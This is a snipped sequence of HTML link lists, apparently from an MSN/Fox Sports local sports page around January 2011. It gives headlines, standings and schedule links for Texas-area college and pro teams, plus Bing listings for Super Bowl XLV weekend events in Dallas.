<li><a href="http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410">UCF wins Conference USA championship</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645">UCF defeats SMU 17-7 to win Conference USA title</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86112">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86068" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86068">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018">Kansas St. 49, North Texas 41</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865">No. 13 Virginia Tech 37, Virginia 7</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195">Tuneup for Hokies is Cavaliers' bowl game</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730">Reserves key to titles, bowls for some ACC teams</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86068">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86127" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86127">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560">Canadian jumps from fire to pro football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026">Leshoure leads Illinois past Baylor in Texas Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910">Illinois finally tastes bowl victory</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273">Bears make first bowl appearance since 1994</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86127">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/houston-rockets" title="Houston Rockets"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png" alt="Houston Rockets logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/houston-rockets">Houston Rockets</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911">Spurs top Rockets, first to 40 wins</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks" title="Dallas Mavericks"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png" alt="Dallas Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/dallas-mavericks">Dallas Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-take-down-Atlanta-Hawks--12911">Mavericks stay hot, topple Hawks</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/HawksMavericks-Preview-77679106">Hawks-Mavericks Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs" title="San Antonio Spurs"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png" alt="San Antonio Spurs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs">San Antonio Spurs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/San-Antonio-Spurs-top-Houston-Rockets-012911">Spurs top Rockets, first to 40 wins</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Weighing-Ws-and-Ls-vs-numbers-in-AllStar-votes-33069128">Weighing W's and L's vs numbers in All-Star votes</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/Spurs-hand-Jazz-6th-straight-loss-012611">Spurs hand Jazz 6th straight loss</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71871" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71871">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175">Baylor 70, Colorado 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281">Jimmermania highlights season's top performances</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486">Kansas St. 69, Baylor 61</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71871">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71650" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71650">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Denver-80-North-Texas-67-66077993">Denver 80, North Texas 67</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535">Louisiana-Lafayette 93, North Texas 88</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539">Louisiana-Lafayette defeats North Texas 93-88</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786">North Texas 83, Arkansas St. 64</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71650">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71926" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71926">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/SMU-75-Rice-68-35158885">SMU 75, Rice 68</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706">SMU 59, Tulsa 58</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346">SMU 79, Southern Miss. 65</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212">UAB 67, SMU 53</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71926">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71780" title="Texas Arlington Mavericks"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif" alt="Texas Arlington Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71780">Texas Arlington Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/TexasArlington-83-Texas-St-66-30375558">Texas-Arlington 83, Texas St. 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240">Texas-Arlington 62, Stephen F.Austin 52</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869">Texas-Arlington 70, Texas A&amp;amp,M-Corpus Christi 49</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261">Lamar 76, Texas-Arlington 72</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71780">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71874" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71874">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Texas-Longhorns-topple-Missouri-Tigers-012911">No. 7 Texas drops No. 11 Missouri</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/MissouriTexas-Preview-94031904">Missouri-Texas Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Sadler-must-look-beyond-borders-for-future-Huskers-50872138">Sadler must look beyond borders for future Huskers</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71874">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71872" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71872">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-75-Oklahoma-St-74-80642690">Texas Tech 75, Oklahoma St. 74</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109">Texas Tech 92, Iowa St. 83</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-72-Nebraska-71-91656634">Texas Tech 72, Nebraska 71</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Oklahoma-83-Texas-Tech-74-06947696">Oklahoma 83, Texas Tech 74</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71872">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71922" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71922">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Air-Force-66-TCU-65-64413866">Air Force 66, TCU 65</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638">Utah 75, TCU 62</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554">No. 9 BYU 83, TCU 67</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904">Colorado St. 79, TCU 69</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71922">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="SMU Mustangs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif" alt="SMU Mustangs - Women logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/wcbk">SMU Mustangs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="TCU Horned Frogs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">TCU Horned Frogs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731">No. 20 TCU 78, Colorado St. 51</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977">No. 23 TCU 81, UNLV 61</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002">No. 22 TCU 80, San Diego St. 63</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027">Wyoming 73, No. 22 TCU 67</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Longhorns - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif" alt="Texas Longhorns - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Longhorns - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders3">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829">CONNECTICUT (38-0)</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251">Nebraska's Yori chosen AP coach of the year</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840">Baylor Lady Bears Roster</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Tech Red Raiders - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Tech Red Raiders - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644">Women's NCAA Championship Winningest Coaches</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331">Fewest Points in One Half - NCAA Tournament</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435">Women's NCAA All-Tournament Teams</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171">OKLAHOMA (27-10)</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Baylor Bears - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif" alt="Baylor Bears - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Baylor Bears - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731">NCAA Women's Final Four MVPs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110">NCAA Championship Scores</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229">Baylor's future bright for Griner, young Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba" title="San Antonio Silver Stars"><img src="http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif" alt="San Antonio Silver Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wnba">San Antonio Silver Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762">Leuchanka leads Belarus to 70-53 upset of Russia</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241">USA aiming for gold at women's basketball worlds</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864">Mercury 92, Silver Stars 73</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wnba/story/Silver-Stars-92%2C-Mercury-91">Phoenix tops San Antonio 92-73 in WNBA playoffs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wnba/stats">Stats</a></li><li><a href="http://msn.foxsports.com/wnba/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wnba">WNBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/houston-astros" title="Houston Astros"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif" alt="Houston Astros logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/houston-astros">Houston Astros</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511">Astros, Rodriguez reach 3-year deal</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288">Astros pitcher Carrillo arrested at Fla. casino</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List">Salary Arbitration Eligibles List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608">Astros infielder Keppinger to have foot surgery</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/texas-rangers" title="Texas Rangers"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif" alt="Texas Rangers logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/texas-rangers">Texas Rangers</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Baltimore-Orioles-Vladimir-Guerrero-contract-offer-012911">Orioles hoping to add Guerrero</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Francicso-signs-oneyear-deal-with-Blue-Jays-27438403">Francicso signs one-year deal with Blue Jays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420">Rangers, Napoli avoid arbitration with $5.8M deal</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Padres-promote-Chris-Gwynn%2C-hire-Dave-Roberts">Padres reach deals with INF Cantu, RHP Burke</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377" title="FC Dallas"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif" alt="FC Dallas logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">FC Dallas</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382" title="Houston Dynamo"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif" alt="Houston Dynamo logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Houston Dynamo</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/team/dallas-stars" title="Dallas Stars"><img src="http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png" alt="Dallas Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nhl/team/dallas-stars">Dallas Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/story/Alex-Ovechkin-Zdeno-Chara-shine-at-NHL-SuperSkills-012911">Ovechkin, Chara shine at NHL SuperSkills</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/Stars-3-Oilers-1-38835353">Stars 3, Oilers 1</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/Dallas-Stars-Jamie-Benn-Tom-Wandell-out-with-upper-body-injuries-012611">Stars' Benn, Wandell out</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nhl/story/OilersStars-Preview-96456130">Oilers-Stars Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/stats/">Stats</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/schedule/">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162394705&quot;]&amp;form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;f538503&quot;]&amp;form=MSNLAP">NFL Experience</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z162393185&quot;]&amp;form=MSNLAP">2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&amp;p1=[Events+source=&quot;vertical&quot;+qzeventid=&quot;z157228725&quot;]&amp;form=MSNLAP">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
